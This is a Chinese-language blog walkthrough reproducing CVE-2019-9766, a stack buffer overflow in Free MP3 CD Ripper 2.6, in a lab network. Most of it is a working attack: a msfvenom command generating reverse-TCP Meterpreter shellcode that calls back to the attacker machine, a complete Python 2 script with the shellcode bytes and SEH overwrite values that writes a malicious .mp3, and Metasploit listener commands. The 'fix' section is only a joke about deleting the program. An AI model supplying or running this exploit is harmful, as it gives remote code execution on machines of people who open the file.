安全响应 | CVE-2019-9766漏洞复现 msf

​

0x00 | 漏洞描述

Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在栈缓冲区溢出漏洞。远程攻击者可借助特制的.mp3文件利用该漏洞执行任意代码。

0x01 | 漏洞细节

---

CVE-2019-9766曝出了关于Free MP3 CD Ripper的缓冲区溢出漏洞，在转换文件时，Free MP3 CD Ripper 2.6中基于堆栈的缓冲区溢出漏洞允许用户辅助的远程攻击者通过特制的.mp3文件执行任意代码。本文详细描述了该漏洞的验证方法，渗透模块的编写及测试过程。

0x02 | 环境准备

---

环境准备：

扫描二维码关注公众号，回复： 9076530 查看本文章

攻击机：Kali 2.0 (2019.4)
靶机：Windows 7 SP2 64位版本
环境网络：
攻击机：使用metasploit进行渗透测试
靶机： 安装Free MP3 CD Ripper 2.6版本
攻击机IP：10.0.0.1/8 交换机：10.0.0.254
靶机IP：10.0.0.2/8  交换机：10.0.0.254
#基于冰崖B区服务器cdn

0x03 | 漏洞复现

---

\0x0 制作反向连接的shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=2333 -f c --smallest

---

\0x1 替换脚本中的shellcode

buffer = "A" * 4116
NSEH = "\xeb\x06\x90\x90"
SEH = "\x84\x20\xe4\x66"
nops = "\x90" * 5
buf = ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
buf += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
buf += "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
buf += "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
buf += "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
buf += "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
buf += "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
buf += "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
buf += "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
buf += "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
buf += "\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
buf += "\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x00\xab"
buf += "\x68\x02\x00\x03\x78\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
buf += "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"
buf += "\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8"
buf += "\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00"
buf += "\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
buf += "\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3"
pad = "B" * (316 - len(nops) - len(buf) )
payload = buffer + NSEH + SEH + nops + buf +pad
try:
    f=open("TestFMCR.mp3","w")
    print "[+] Creating %s bytes mp3 File..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] mp3 File created successfully!"
except:
    print "File cannot be created!"

编写payload，然使用Python2

---

\0x2 运行脚本,生成payload

---

并且移动到靶机windows7(装有Freemp3 2.6)上面

\0x3 打开msf并设置监听

msfconsole #打开metasploit
set lhost Your IP #你的IP
set lport You Port #你的端口
set payload windows/meterpreter/reverse_tcp #设置buff的payload
exploit #开启监听

\0x4 在windows7靶机上面运行软件并播放payload

---

未响应不要在意，反正meterpreter返回成功了

\0x4 渗透成功！实验结束

---

0x04 | 漏洞修复

---

删除Free MP3 CD Ripper (滑稽) 

0x05 | 作者的话

---

最近忙着学习缓存区Buff，有空的话给大家写一篇关于UAF，删除堆块泄漏heap地址的文章

扫码关注我们！